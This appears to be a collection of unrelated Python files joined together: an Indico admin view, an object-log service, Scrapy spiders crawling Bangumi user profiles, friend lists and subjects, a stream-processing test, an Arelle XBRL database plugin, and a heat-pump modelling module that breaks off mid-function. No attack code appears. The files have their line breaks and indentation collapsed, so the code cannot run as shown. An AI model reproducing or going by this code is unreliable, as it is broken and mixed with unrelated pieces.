# This file is part of Indico. # Copyright (C) 2002 - 2021 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from indico.util.i18n import _ from indico.web.breadcrumbs import render_breadcrumbs from indico.web.flask.util import url_for from indico.web.menu import get_menu_item from indico.web.views import WPDecorated, WPJinjaMixin class WPAdmin(WPJinjaMixin, WPDecorated): """Base class for admin pages.""" def __init__(self, rh, active_menu_item=None, **kwargs): kwargs['active_menu_item'] = active_menu_item or self.sidemenu_option WPDecorated.__init__(self, rh, **kwargs) def _get_breadcrumbs(self): menu_item = get_menu_item('admin-sidemenu', self._kwargs['active_menu_item']) items = [(_('Administration'), url_for('core.admin_dashboard'))] if menu_item: items.append(menu_item.title) return render_breadcrumbs(*items) def _get_body(self, params): return self._get_page_content(params)
python
import json class ObjectLogService: """ Служба журналирования логов по объектам """ def __init__(self, app): """ :type app: metasdk.MetaApp """ self.__app = app self.__options = {} def log(self, record): """ Делает запись по объекту в журнале """ record['dispatcher'] = self.__app.dispatcher_name if 'value' in record and record['value']: if not isinstance(record['value'], dict): raise ValueError("ObjectLogService expected dict in log record value field") record['jsonValue'] = json.dumps(record['value']) record.pop('value') body_value = { "record": record } return self.__app.native_api_call('object-log', 'log', body_value, self.__options, False, None, False, http_path="/api/meta/v1/", http_method='POST')
python
# -*- coding: utf-8 -*- import scrapy import re from bgm.items import Record, Index, Friend, User, SubjectInfo, Subject from bgm.util import * from scrapy.http import Request import datetime import json mpa = dict([(i, None) for i in range(32)]) class UserSpider(scrapy.Spider): name = 'user' def __init__(self, *args, **kwargs): super(UserSpider, self).__init__(*args, **kwargs) if not hasattr(self, 'id_max'): self.id_max=400000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): if len(response.xpath(".//*[@id='headerProfile']"))==0: return user = response.xpath(".//*[@id='headerProfile']/div/div/h1/div[3]/small/text()").extract()[0][1:] nickname = response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()[0].translate(mpa) # Is blocked? if len(response.xpath("//ul[@class='timeline']/li"))==0: return; if not 'redirect_urls' in response.meta: uid = int(user) else: uid = int(response.meta['redirect_urls'][0].split('/')[-1]) date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0] date = parsedate(date) yield User(name=user, nickname=nickname, uid=uid, joindate=date) class IndexSpider(scrapy.Spider): name='index' def __init__(self, *args, **kwargs): super(IndexSpider, self).__init__(*args, **kwargs) if not hasattr(self, 'id_max'): self.id_max=20000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/index/"+str(i) for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a"))==0: return indexid = response.url.split('/')[-1] indexid=int(indexid) creator = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a/@href").extract()[0].split('/')[-1] creator=str(creator).translate(mpa) td = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[1]/text()").extract()[0] date = parsedate(td.split(' ')[0]) if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span"))==2: favourite = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[2]/text()").extract()[0] favourite = int(favourite) else: favourite = 0 items = response.xpath(".//*[@id='columnSubjectBrowserA']/ul/li/@id").extract() items = [int(itm.split('_')[-1]) for itm in items] yield Index(indexid=indexid, creator=creator, favourite=favourite, date=date, items=items) class RecordSpider(scrapy.Spider): name='record' def __init__(self, *args, **kwargs): super(RecordSpider, self).__init__(*args, **kwargs) if hasattr(self, 'userlist'): userlist = [] with open(self.userlist, 'r') as fr: while True: l = fr.readline().strip() if not l: break; userlist.append(l) self.start_urls = ["http://mirror.bgm.rin.cat/user/"+i for i in userlist] else: if not hasattr(self, 'id_max'): self.id_max=500000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): username = response.url.split('/')[-1] if (not response.xpath(".//*[@id='headerProfile']")) or response.xpath(".//div[@class='tipIntro']"): return if username in blockusers: return uid = int(response.meta['redirect_urls'][0].split('/')[-1]) if 'redirect_urls' in response.meta else int(username) nickname = next(iter(response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()), "").translate(mpa) date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0] date = parsedate(date) yield User(name=username, nickname=nickname, uid=uid, joindate=date) if len(response.xpath(".//*[@id='anime']")): yield scrapy.Request("http://mirror.bgm.rin.cat/anime/list/"+username, callback = self.merge, meta = { 'uid': uid }) if len(response.xpath(".//*[@id='game']")): yield scrapy.Request("http://mirror.bgm.rin.cat/game/list/"+username, callback = self.merge, meta = { 'uid': uid }) if len(response.xpath(".//*[@id='book']")): yield scrapy.Request("http://mirror.bgm.rin.cat/book/list/"+username, callback = self.merge, meta = { 'uid': uid }) if len(response.xpath(".//*[@id='music']")): yield scrapy.Request("http://mirror.bgm.rin.cat/music/list/"+username, callback = self.merge, meta = { 'uid': uid }) if len(response.xpath(".//*[@id='real']")): yield scrapy.Request("http://mirror.bgm.rin.cat/real/list/"+username, callback = self.merge, meta = { 'uid': uid }) def merge(self, response): followlinks = response.xpath("//ul[@class='navSubTabs']/li/a/@href").extract() # a list of links for link in followlinks: yield scrapy.Request(u"http://mirror.bgm.rin.cat"+link, callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] }) def parse_recorder(self, response): state = response.url.split('/')[-1].split('?')[0] page = 1 if '=' not in response.url else int(response.url.split('=')[1]) tp = response.url.split('/')[-4] items = response.xpath(".//*[@id='browserItemList']/li") for item in items: item_id = int(re.match(r"item_(\d+)",item.xpath("./@id").extract()[0]).group(1)) item_date = parsedate(item.xpath("./div/p[@class='collectInfo']/span[@class='tip_j']/text()").extract()[0]) if item.xpath("./div/p[@class='collectInfo']/span[@class='tip']"): item_tags = item.xpath("./div/p[@class='collectInfo']/span[@class='tip']/text()").extract()[0].split(u' ')[2:-1] else: item_tags=None try_match = next(iter(item.xpath("./div/p[@class='collectInfo']/span[@class='starstop-s']/span/@class").extract()), None) if try_match is not None: mtch = re.match(r'starlight stars(\d+)', try_match) item_rate = mtch.group(1) item_rate = int(item_rate) else: item_rate = None comment = item.xpath(".//div[@class='text']/text()").extract()[0] if len(item.xpath(".//div[@class='text']")) > 0 else None watchRecord = Record( uid = response.meta['uid'], typ = tp, state = state, iid = item_id, adddate = item_date ) if item_tags: watchRecord["tags"]=item_tags if item_rate: watchRecord["rate"]=item_rate if comment: watchRecord["comment"]=comment.translate(mpa) yield watchRecord total_count = int(re.search(r"(\d+)", response.xpath("//ul[@class='navSubTabs']/li/a[@class='focus']/span/text()").extract()[0]).group(1)) if 24 * page < total_count: yield scrapy.Request(getnextpage(response.url),callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] }) class FriendsSpider(scrapy.Spider): name='friends' handle_httpstatus_list = [302] def __init__(self, *args, **kwargs): super(FriendsSpider, self).__init__(*args, **kwargs) if not hasattr(self, 'id_max'): self.id_max=400000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i)+"/friends" for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): user = response.url.split('/')[-2] lst = response.xpath(".//*[@id='memberUserList']/li//@href").extract() for itm in lst: yield Friend(user = user, friend = str(itm.split('/')[-1])) class SubjectInfoSpider(scrapy.Spider): name="subjectinfo" def __init__(self, *args, **kwargs): super(SubjectInfoSpider, self).__init__(*args, **kwargs) if not hasattr(self, 'id_max'): self.id_max=300000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): subject_id = int(response.url.split('/')[-1]) if not response.xpath(".//*[@id='headerSubject']"): return if response.xpath(".//div[@class='tipIntro']"): return typestring = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0] typestring = typestring.split(' ')[1]; infobox = [itm.extract()[:-2] for itm in response.xpath(".//div[@class='infobox']//span/text()")] infobox = set(infobox) relations = [itm.extract() for itm in response.xpath(".//ul[@class='browserCoverMedium clearit']/li[@class='sep']/span/text()")] relations = set(relations) yield SubjectInfo(subjectid=subject_id, subjecttype=typestring, infobox=infobox, relations=relations) class SubjectSpider(scrapy.Spider): name="subject" def __init__(self, *args, **kwargs): super(SubjectSpider, self).__init__(*args, **kwargs) if hasattr(self, 'itemlist'): itemlist = [] with open(self.itemlist, 'r') as fr: while True: l = fr.readline().strip() if not l: break; itemlist.append(l) self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+i for i in itemlist] else: if not hasattr(self, 'id_max'): self.id_max=300000 if not hasattr(self, 'id_min'): self.id_min=1 self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))] def parse(self, response): subjectid = int(response.url.split('/')[-1]) # trueid if not response.xpath(".//*[@id='headerSubject']"): return # This is used to filter those locked items # However, considering that current Bangumi ranking list does not exclude blocked items, # we include them in our spider. #if response.xpath(".//div[@class='tipIntro']"): # return; if 'redirect_urls' in response.meta: order = int(response.meta['redirect_urls'][0].split('/')[-1]) else: order = subjectid; # id subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/attribute::title").extract()[0] if not subjectname: subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/text()").extract()[0] subjecttype = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0] subjecttype = subjecttype.split(' ')[1].lower(); infokey = [itm[:-2] for itm in response.xpath(".//div[@class='infobox']//li/span/text()").extract()] infoval = response.xpath(".//div[@class='infobox']//li") infobox = dict() alias = [] for key,val in zip(infokey, infoval): if val.xpath("a"): infobox[key]=[ref.split('/')[-1] for ref in val.xpath("a/@href").extract()] if key == '别名': alias.append(val.xpath('text()').extract()[0]) relateditms = response.xpath(".//ul[@class='browserCoverMedium clearit']/li") relations = dict() for itm in relateditms: if itm.xpath("@class"): relationtype = itm.xpath("span/text()").extract()[0] relations[relationtype]=[itm.xpath("a[@class='title']/@href"). extract()[0].split('/')[-1]] else: relations[relationtype].append(itm.xpath("a[@class='title']/@href"). extract()[0].split('/')[-1]) brouche = response.xpath(".//ul[@class='browserCoverSmall clearit']/li") if brouche: relations['单行本']=[itm.split('/')[-1] for itm in brouche.xpath("a/@href").extract()] yield Subject(subjectid=subjectid, subjecttype=subjecttype, subjectname=subjectname, order=order, alias=alias, staff=infobox, relations=relations)
python
if __package__ is None: import sys from os import path sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) ) from functools import partial from Stream import Stream, StreamArray from Stream import _no_value from Operators import stream_func from stream_test import * def square(v): return v*v def square_stream_when_clock_ticks( input_stream, trigger_stream): return stream_func(inputs=input_stream, f_type='element', f=square, num_outputs=1, call_streams=[trigger_stream] ) def test(): x = Stream('x') a = StreamArray('a') clock_ticks = Stream('clock') y = square_stream_when_clock_ticks( input_stream=x, trigger_stream=clock_ticks) z = square_stream_when_clock_ticks( input_stream=a, trigger_stream=clock_ticks) y.set_name('y') z.set_name('z') check(y, [9, 25, 4, 16]) check(z, [9.0, 25.0, 4.0, 16.0]) x.extend([3, 5]) a.extend([3, 5]) x.print_recent() a.print_recent() clock_ticks.print_recent() y.print_recent() z.print_recent() print x.extend([2, 4]) a.extend([2, 4]) x.print_recent() a.print_recent() clock_ticks.print_recent() y.print_recent() z.print_recent() print clock_ticks.extend(['tick']) x.print_recent() a.print_recent() clock_ticks.print_recent() y.print_recent() z.print_recent() print clock_ticks.extend(['tick']) x.print_recent() a.print_recent() clock_ticks.print_recent() y.print_recent() z.print_recent() check_empty() if __name__ == '__main__': test()
python
''' xbrlDB is an interface to XBRL databases. Two implementations are provided: (1) the XBRL Public Database schema for Postgres, published by XBRL US. (2) an graph database, based on the XBRL Abstract Model PWD 2. (c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved. Mark V copyright applies to this software, which is licensed according to the terms of Arelle(r). and does not apply to the XBRL US Database schema and description. ''' import time, os, io, sys, logging from arelle.Locale import format_string from .XbrlPublicPostgresDB import insertIntoDB as insertIntoPostgresDB, isDBPort as isPostgresPort from .XbrlSemanticGraphDB import insertIntoDB as insertIntoRexsterDB, isDBPort as isRexsterPort from .XbrlSemanticRdfDB import insertIntoDB as insertIntoRdfDB, isDBPort as isRdfPort dbTypes = { "postgres": insertIntoPostgresDB, "rexster": insertIntoRexsterDB, "rdfDB": insertIntoRdfDB } def xbrlDBmenuEntender(cntlr, menu): def storeIntoDBMenuCommand(): # save DTS menu item has been invoked if cntlr.modelManager is None or cntlr.modelManager.modelXbrl is None: cntlr.addToLog("No XBRL instance or taxonomy is loaded.") return from arelle.DialogUserPassword import askDatabase # (user, password, host, port, database) priorDBconnection = cntlr.config.get("xbrlDBconnection", None) dbConnection = askDatabase(cntlr.parent, priorDBconnection) if not dbConnection: # action cancelled return def backgroundStoreIntoDB(): try: host, port, user, password, db, timeout, dbType = dbConnection if timeout and timeout.isdigit(): timeout = int(timeout) # identify server if dbType in dbTypes: insertIntoDB = dbTypes[dbType] else: cntlr.addToLog(_("Probing host {0} port {1} to determine server database type.") .format(host, port)) if isPostgresPort(host, port): dbType = "postgres" insertIntoDB = insertIntoPostgresDB elif isRexsterPort(host, port): dbType = "rexster" insertIntoDB = insertIntoRexsterDB elif isRdfPort(host, port, db): dbType = "rdfDB" insertIntoDB = insertIntoRdfDB else: cntlr.addToLog(_("Unable to determine server type!\n ") + _("Probing host {0} port {1} unable to determine server type.") .format(host, port)) cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type cntlr.saveConfig() return cntlr.addToLog(_("Database type {} identified.").format(dbType)) cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, dbType) cntlr.saveConfig() startedAt = time.time() insertIntoDB(cntlr.modelManager.modelXbrl, host=host, port=port, user=user, password=password, database=db, timeout=timeout) cntlr.addToLog(format_string(cntlr.modelManager.locale, _("stored to database in %.2f secs"), time.time() - startedAt)) except Exception as ex: import traceback cntlr.addToLog( _("[xpDB:exception] Loading XBRL DB: %(exception)s: %(error)s \n%(traceback)s") % {"exception": ex.__class__.__name__, "error": str(ex), "exc_info": True, "traceback": traceback.format_tb(sys.exc_info()[2])}) cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type cntlr.saveConfig() import threading thread = threading.Thread(target=backgroundStoreIntoDB) thread.daemon = True thread.start() # Extend menu with an item for the savedts plugin menu.add_command(label="Store to XBRL DB", underline=0, command=storeIntoDBMenuCommand) # add log handler logging.getLogger("arelle").addHandler(LogToDbHandler()) def storeIntoDB(dbConnection, modelXbrl, rssItem=None): host = port = user = password = db = timeout = dbType = None if isinstance(dbConnection, (list, tuple)): # variable length list if len(dbConnection) > 0: host = dbConnection[0] if len(dbConnection) > 1: port = dbConnection[1] if len(dbConnection) > 2: user = dbConnection[2] if len(dbConnection) > 3: password = dbConnection[3] if len(dbConnection) > 4: db = dbConnection[4] if len(dbConnection) > 5 and dbConnection[5] and dbConnection[5].isdigit(): timeout = int(dbConnection[5]) if len(dbConnection) > 6: dbType = dbConnection[6] startedAt = time.time() if dbType in dbTypes: insertIntoDB = dbTypes[dbType] elif isPostgresPort(host, port): insertIntoDB = insertIntoPostgresDB elif isRexsterPort(host, port): insertIntoDB = insertIntoRexsterDB elif isRdfPort(host, port, db): insertIntoDB = insertIntoRdfDB else: modelXbrl.modelManager.addToLog('Server at "{0}:{1}" is not recognized to be either a Postgres or a Rexter service.'.format(host, port)) return insertIntoDB(modelXbrl, host=host, port=port, user=user, password=password, database=db, timeout=timeout, rssItem=rssItem) modelXbrl.modelManager.addToLog(format_string(modelXbrl.modelManager.locale, _("stored to database in %.2f secs"), time.time() - startedAt), messageCode="info", file=modelXbrl.uri) def xbrlDBcommandLineOptionExtender(parser): # extend command line options to import sphinx files into DTS for validation parser.add_option("--store-to-XBRL-DB", action="store", dest="storeToXbrlDb", help=_("Store into XBRL DB. " "Provides connection string: host,port,user,password,database[,timeout[,{postgres|rexster|rdfDB}]]. " "Autodetects database type unless 7th parameter is provided. ")) logging.getLogger("arelle").addHandler(LogToDbHandler()) def xbrlDBCommandLineXbrlLoaded(cntlr, options, modelXbrl): from arelle.ModelDocument import Type if modelXbrl.modelDocument.type == Type.RSSFEED and getattr(options, "storeToXbrlDb", False): modelXbrl.xbrlDBconnection = options.storeToXbrlDb.split(",") def xbrlDBCommandLineXbrlRun(cntlr, options, modelXbrl): from arelle.ModelDocument import Type if modelXbrl.modelDocument.type != Type.RSSFEED and getattr(options, "storeToXbrlDb", False): dbConnection = options.storeToXbrlDb.split(",") storeIntoDB(dbConnection, modelXbrl) def xbrlDBvalidateRssItem(val, modelXbrl, rssItem): if hasattr(val.modelXbrl, 'xbrlDBconnection'): storeIntoDB(val.modelXbrl.xbrlDBconnection, modelXbrl, rssItem) def xbrlDBdialogRssWatchDBconnection(*args, **kwargs): try: from .DialogRssWatchExtender import dialogRssWatchDBextender dialogRssWatchDBextender(*args, **kwargs) except ImportError: pass def xbrlDBdialogRssWatchValidateChoices(dialog, frame, row, options, cntlr): from arelle.UiUtil import checkbox dialog.checkboxes += ( checkbox(frame, 2, row, "Store into XBRL Database", "storeInXbrlDB"), ) def xbrlDBrssWatchHasWatchAction(rssWatchOptions): return rssWatchOptions.get("xbrlDBconnection") and rssWatchOptions.get("storeInXbrlDB") def xbrlDBrssDoWatchAction(modelXbrl, rssWatchOptions, rssItem): dbConnectionString = rssWatchOptions.get("xbrlDBconnection") if dbConnectionString: dbConnection = dbConnectionString.split(',') storeIntoDB(dbConnection, modelXbrl) class LogToDbHandler(logging.Handler): def __init__(self): super(LogToDbHandler, self).__init__() self.logRecordBuffer = [] def flush(self): del self.logRecordBuffer[:] def dbHandlerLogEntries(self, clear=True): entries = [] for logRec in self.logRecordBuffer: message = { "text": self.format(logRec) } if logRec.args: for n, v in logRec.args.items(): message[n] = v entry = {"code": logRec.messageCode, "level": logRec.levelname.lower(), "refs": logRec.refs, "message": message} entries.append(entry) if clear: del self.logRecordBuffer[:] return entries def emit(self, logRecord): self.logRecordBuffer.append(logRecord) __pluginInfo__ = { 'name': 'XBRL Database', 'version': '0.9', 'description': "This plug-in implements the XBRL Public Postgres and Abstract Model Graph Databases. ", 'license': 'Apache-2 (Arelle plug-in), BSD license (pg8000 library)', 'author': 'Mark V Systems Limited', 'copyright': '(c) Copyright 2013 Mark V Systems Limited, All rights reserved,\n' 'uses: pg8000, Copyright (c) 2007-2009, Mathieu Fenniak (XBRL Public Postgres DB), and\n' ' rdflib, Copyright (c) 2002-2012, RDFLib Team (RDF DB)', # classes of mount points (required) 'CntlrWinMain.Menu.Tools': xbrlDBmenuEntender, 'CntlrCmdLine.Options': xbrlDBcommandLineOptionExtender, 'CntlrCmdLine.Xbrl.Loaded': xbrlDBCommandLineXbrlLoaded, 'CntlrCmdLine.Xbrl.Run': xbrlDBCommandLineXbrlRun, 'DialogRssWatch.FileChoices': xbrlDBdialogRssWatchDBconnection, 'DialogRssWatch.ValidateChoices': xbrlDBdialogRssWatchValidateChoices, 'RssWatch.HasWatchAction': xbrlDBrssWatchHasWatchAction, 'RssWatch.DoWatchAction': xbrlDBrssDoWatchAction, 'Validate.RssItem': xbrlDBvalidateRssItem }
python
"""Heat pump module Modelling a heat pump with modelling approaches of simple, lorentz, generic regression, and standard test regression """ import os import math import pandas as pd import numpy as np import matplotlib.pyplot as plt from matplotlib.backends.backend_pdf import PdfPages from sklearn.linear_model import LinearRegression from sklearn.preprocessing import PolynomialFeatures import tools as t import weather import inputs plt.style.use('ggplot') plt.rcParams.update({'font.size': 22}) def perf(name, subname): myInputs = inputs.Inputs(name, subname) input_weather = myInputs.weather() inputs_basics = myInputs.heatpump_basics() modelling_approach = inputs_basics['modelling_approach'] if modelling_approach == 'Simple': inputs_simple = myInputs.heatpump_simple() inputs_demands = myInputs.demands() myHeatPump = HeatPump( inputs_basics['heat_pump_type'], inputs_basics['modelling_approach'], inputs_basics['capacity'], inputs_basics['ambient_delta_t'], inputs_basics['minimum_runtime'], inputs_basics['minimum_output'], inputs_basics['data_input'], inputs_demands['source_temp'], inputs_demands['return_temp_DH'], input_weather, simple_cop=inputs_simple) return myHeatPump.performance() elif modelling_approach == 'Lorentz': inputs_lorentz = myInputs.heatpump_lorentz() inputs_demands = myInputs.demands() myHeatPump = HeatPump( inputs_basics['heat_pump_type'], inputs_basics['modelling_approach'], inputs_basics['capacity'], inputs_basics['ambient_delta_t'], inputs_basics['minimum_runtime'], inputs_basics['minimum_output'], inputs_basics['data_input'], inputs_demands['source_temp'], inputs_demands['return_temp_DH'], input_weather, lorentz_inputs=inputs_lorentz) return myHeatPump.performance() elif modelling_approach == 'Generic regression': inputs_demands = myInputs.demands() myHeatPump = HeatPump( inputs_basics['heat_pump_type'], inputs_basics['modelling_approach'], inputs_basics['capacity'], inputs_basics['ambient_delta_t'], inputs_basics['minimum_runtime'], inputs_basics['minimum_output'], inputs_basics['data_input'], inputs_demands['source_temp'], inputs_demands['return_temp_DH'], input_weather) return myHeatPump.performance() elif modelling_approach == 'Standard test regression': inputs_standard_regression = myInputs.heatpump_standard_regression() inputs_demands = myInputs.demands() myHeatPump = HeatPump( inputs_basics['heat_pump_type'], inputs_basics['modelling_approach'], inputs_basics['capacity'], inputs_basics['ambient_delta_t'], inputs_basics['minimum_runtime'], inputs_basics['minimum_output'], inputs_basics['data_input'], inputs_demands['source_temp'], inputs_demands['return_temp_DH'], input_weather, standard_test_regression_inputs=inputs_standard_regression) return myHeatPump.performance() class HeatPump(object): def __init__(self, hp_type, modelling_approach, capacity, ambient_delta_t, minimum_runtime, minimum_output, data_input, flow_temp_source, return_temp, hp_ambient_temp, simple_cop=None, lorentz_inputs=None, generic_regression_inputs=None, standard_test_regression_inputs=None ): """heat pump class object Arguments: hp_type {string} -- type of heatpump, ASHP, WSHP, GSHP modelling_approach {str} -- simple, lorentz, generic, standard regression capacity {float} -- thermal capacity of heat pump ambient_delta_t {int} -- drop in ambient source temperature from inlet to outlet minimum_runtime {string} -- fixed or variable speed compressor data_input {str} -- type of data input, peak or integrated flow_temp {dataframe} -- required temperatures out of HP return_temp {dataframe} -- inlet temp to HP weather {dic} -- ambient conditions of heat source Keyword Arguments: all these are for inputs, bar simple, for different modelling approaches simple_cop {float} -- only COP for simple (default: {None}) lorentz_inputs {dic} -- (default: {None}) generic_regression_inputs {dic} -- (default: {None}) standard_test_regression_inputs {dic} -- (default: {None}) """ self.hp_type = hp_type self.modelling_approach = modelling_approach self.capacity = capacity self.ambient_delta_t = ambient_delta_t self.minimum_runtime = minimum_runtime self.minimum_output = minimum_output self.data_input = data_input self.flow_temp_source = flow_temp_source self.return_temp = return_temp self.hp_ambient_temp = hp_ambient_temp self.simple_cop = simple_cop self.lorentz_inputs = lorentz_inputs self.generic_regression_inputs = generic_regression_inputs self.standard_test_regression_inputs = standard_test_regression_inputs def heat_resource(self): """accessing the heat resource takes the hp resource from the weather class Returns: dataframe -- ambient temperature for heat source of heat pump """ HP_resource = weather.Weather( air_temperature=self.hp_ambient_temp['air_temperature'], water_temperature=self.hp_ambient_temp['water_temperature']).heatpump() if self.hp_type == 'ASHP': HP_resource = HP_resource.rename( columns={'air_temperature': 'ambient_temp'}) return HP_resource[['ambient_temp']] elif self.hp_type == 'WSHP': HP_resource = HP_resource.rename( columns={'water_temperature': 'ambient_temp'}) return HP_resource[['ambient_temp']] else: print('ERROR invalid heat pump type') def performance(self): """performance over year of heat pump input a timestep from which gathers inputs a method for calculating the heat pump performance (cop and duty) for a timetsp outputs are dict containing Returns: dic -- cop and duty for each hour timestep in year """ if self.capacity == 0: performance = [] for timesteps in range(8760): # cop needs to be low to not break the mpc solver # duty being zero means it won't choose it anyway p = {'cop': 0.5, 'duty': 0} performance.append(p) return performance ambient_temp = self.heat_resource()['ambient_temp'] if self.modelling_approach == 'Simple': cop_x = self.simple_cop duty_x = self.capacity elif self.modelling_approach == 'Lorentz': myLorentz = Lorentz(self.lorentz_inputs['cop'], self.lorentz_inputs['flow_temp_spec'], self.lorentz_inputs['return_temp_spec'], self.lorentz_inputs['temp_ambient_in_spec'], self.lorentz_inputs['temp_ambient_out_spec'], self.lorentz_inputs['elec_capacity']) hp_eff = myLorentz.hp_eff() elif self.modelling_approach == 'Generic regression': myGenericRegression = GenericRegression() duty_x = self.capacity elif self.modelling_approach == 'Standard test regression': myStandardRegression = StandardTestRegression( self.standard_test_regression_inputs['data_x'], self.standard_test_regression_inputs['data_COSP'], self.standard_test_regression_inputs['data_duty']) models = myStandardRegression.train() COP_model = models['COP_model'] duty_model = models['duty_model'] performance = [] for timestep in range(8760): if self.modelling_approach == 'Simple': cop = cop_x hp_duty = duty_x elif self.modelling_approach == 'Lorentz': ambient_return = ambient_temp[timestep] - self.ambient_delta_t cop = myLorentz.calc_cop(hp_eff, self.flow_temp_source[timestep], self.return_temp[timestep], ambient_temp[timestep], ambient_return) hp_duty = myLorentz.calc_duty(self.capacity) elif self.modelling_approach == 'Generic regression': if self.hp_type == 'ASHP': cop = myGenericRegression.ASHP_cop( self.flow_temp_source[timestep], ambient_temp[timestep]) elif self.hp_type == 'GSHP' or self.hp_type == 'WSHP': cop = myGenericRegression.GSHP_cop( self.flow_temp_source[timestep], ambient_temp[timestep]) # account for defrosting below 5 drg if ambient_temp[timestep] <= 5: cop = 0.9 * cop hp_duty = duty_x elif self.modelling_approach == 'Standard test regression': hp_duty = myStandardRegression.predict_duty( duty_model, ambient_temp[timestep], self.flow_temp_source[timestep]) # 15% reduction in performance if # data not done to standards if self.data_input == 'Integrated performance' or ambient_temp[timestep] > 5: cop = myStandardRegression.predict_COP( COP_model, ambient_temp[timestep], self.flow_temp_source[timestep]) elif self.data_input == 'Peak performance': if self.hp_type == 'ASHP': if ambient_temp[timestep] <= 5: cop = 0.9 * myStandardRegression.predict_COP( COP_model, ambient_temp[timestep], self.flow_temp_source[timestep]) d = {'cop': cop, 'duty': hp_duty} performance.append(d) return performance def elec_usage(self, demand, hp_performance): """electricity usage of hp for timestep given a thermal demand calculates the electrical usage of the heat pump given a heat demand outputs a dataframe of heat demand, heat pump heat demand, heat pump elec demand, cop, duty, and leftover (only non-zero for fixed speed HP) Arguments: timestep {int} -- timestep to be calculated demand {float} -- thermal demand to be met by heat pump hp_performance {dic} -- dic containing the cop and duty for timesteps over year Returns: dic -- heat demand to be met, cop, duty, heat demand met by hp, electricity usage of heat pump """ if self.capacity == 0: return {'hp_demand': 0.0, 'hp_elec': 0.0} cop = hp_performance['cop'] duty = hp_performance['duty'] max_elec_usage = demand / cop max_elec_cap = duty / cop hp_elec = min(max_elec_usage, max_elec_cap) hp_demand = hp_elec * cop d = {'hp_demand': hp_demand, 'hp_elec': hp_elec} return d def thermal_output(self, elec_supply, hp_performance, heat_demand): """thermal output from a given electricity supply Arguments: timestep {int} -- timestep to be modelled elec_supply {float} -- electricity supply used by heat pump hp_performance {dic} -- dic containing the cop and duty for timesteps over year heat_demand {float} -- heat demand to be met of timestep Returns: dic -- max_thermal_output, heat demand met by hp, electricity usage of heat pump """ if self.capacity == 0: return {'hp_demand': 0.0, 'hp_elec': 0.0} cop = hp_performance['cop'] duty = hp_performance['duty'] # maximum thermal output given elec supply max_thermal_output = elec_supply * cop # demand met by hp is min of three arguments hp_demand = min(max_thermal_output, heat_demand, duty) hp_elec = hp_demand / cop d = {'hp_demand': hp_demand, 'hp_elec': hp_elec} return d class Lorentz(object): def __init__(self, cop, flow_temp_spec, return_temp_spec, ambient_temp_in_spec, ambient_temp_out_spec, elec_capacity): """lorentz calculations and attributes based on EnergyPRO method Arguments: cop {float} -- cop at specified conditions flow_temp_spec {float} -- temperature from HP spec return_temp_spec {float} -- tempature to HP spec ambient_temp_in_spec {float} -- specificed ambient_temp_out_spec {float} -- spec elec_capacity {float} -- absolute """ self.cop = cop self.flow_temp_spec = flow_temp_spec self.return_temp_spec = return_temp_spec self.ambient_temp_in_spec = ambient_temp_in_spec self.ambient_temp_out_spec = ambient_temp_out_spec self.elec_capacity = elec_capacity def hp_eff(self): """heat pump efficiency which is static # calcultaions of the lorentz model. starting with the mean temps fo # for the temp flow and return of heat pump, t high mean # and the ambient in and out temps, t low mean Returns: float -- efficiency of the heat pump """ t_high_mean = ((self.flow_temp_spec - self.return_temp_spec) / (math.log((self.flow_temp_spec + 273.15) / (self.return_temp_spec + 273.15)))) t_low_mean = ( (self.ambient_temp_in_spec - self.ambient_temp_out_spec) / (math.log((self.ambient_temp_in_spec + 273.15) / (self.ambient_temp_out_spec + 273.15)))) # lorentz cop is the highest theoretical cop cop_lorentz = t_high_mean / (t_high_mean - t_low_mean) # this gives the heat pump efficiency using the stated cop # the lorentz cop is calcualted for each timestep # then this is multiplied by the heat pump # efficiency to give actual cop hp_eff = self.cop / cop_lorentz return hp_eff def calc_cop(self, hp_eff, flow_temp, return_temp, ambient_temp_in, ambient_temp_out): """cop for timestep calculates the cop based upon actual flow/retur and ambient uses heat pump efficiency from before Arguments: hp_eff {float} -- heat pump efficiency flow_temp {float} -- flow temperature from heat pump return_temp {float} -- temperature returning to heat pump ambient_temp_in {float} -- real-time ambient_temp_out {float} -- real-time Returns: float -- cop for timestep """ t_high_mean = ((flow_temp - return_temp) / (math.log((flow_temp + 273.15) / (return_temp + 273.15)))) 